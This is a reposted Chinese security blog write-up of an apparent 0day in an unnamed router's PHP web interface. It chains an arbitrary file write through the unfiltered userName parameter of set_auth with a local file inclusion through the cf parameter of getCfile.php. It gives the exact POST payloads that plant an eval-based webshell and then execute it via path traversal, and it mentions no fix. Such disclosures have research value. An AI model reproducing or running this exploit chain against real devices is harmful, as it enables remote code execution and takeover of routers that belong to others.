某路由审计0day之文件包含-2
2021-08-26 14:51:07 Author: www.secpulse.com(查看原文) 阅读量:43 收藏

作者:Dodgers

一、审计步骤:

(一)查找写入文件函数:

自动化审计,在这个/auth_pi/authService.php文件下发现file_put_contents函数可控,跟进该文件。

images20210825103315.png

/auth_pi/authService.php文件的set_authAction方法。在76行的提醒语句也说明了该info文件在user_auth目录下,而且也未对userName进行安全过滤,这里可以任意路径创建文件。

images20210825103329.png

而P方法存在于/mvc/lib/core.function.php的类里面,是用来接收POST传参。

images20210825103340.png

这里注意:包含路径是data下的

images20210825103348.png

利用方式:
1:post请求
2:请求参数a=set_auth
3:参数为userName、auth

payload:
userName=tr1&auth=?php%20@eval($_POST['w']);?

images20210825103359.png

(二)查找文件包含函数:

自动化审计,在这个/local/auth/php/getCfile.php文件下发现include 函数可控,跟进该文件。

images20210825103409.png

这个文件通过post方式传参但是并没有对cf参数进行安全过滤

images20210825103416.png

利用方式:
1:post请求
2:必须存在tmp/app_auth/cfile目录或者自己创建
3:参数为cf、&field=1

payload:
cf=../../../data/tr.info&field=1&w=phpinfo();
说明:这里的文件需要刚刚写文件的文件名

images20210825103425.png

该文章来源火线Zone社区:https://zone.huoxian.cn/d/433-0day-2

本文作者:火线安全平台

本文为安全脉搏专栏作者发布,转载请注明:https://www.secpulse.com/archives/165255.html


文章来源: https://www.secpulse.com/archives/165255.html
如有侵权请联系:admin#unsafe.sh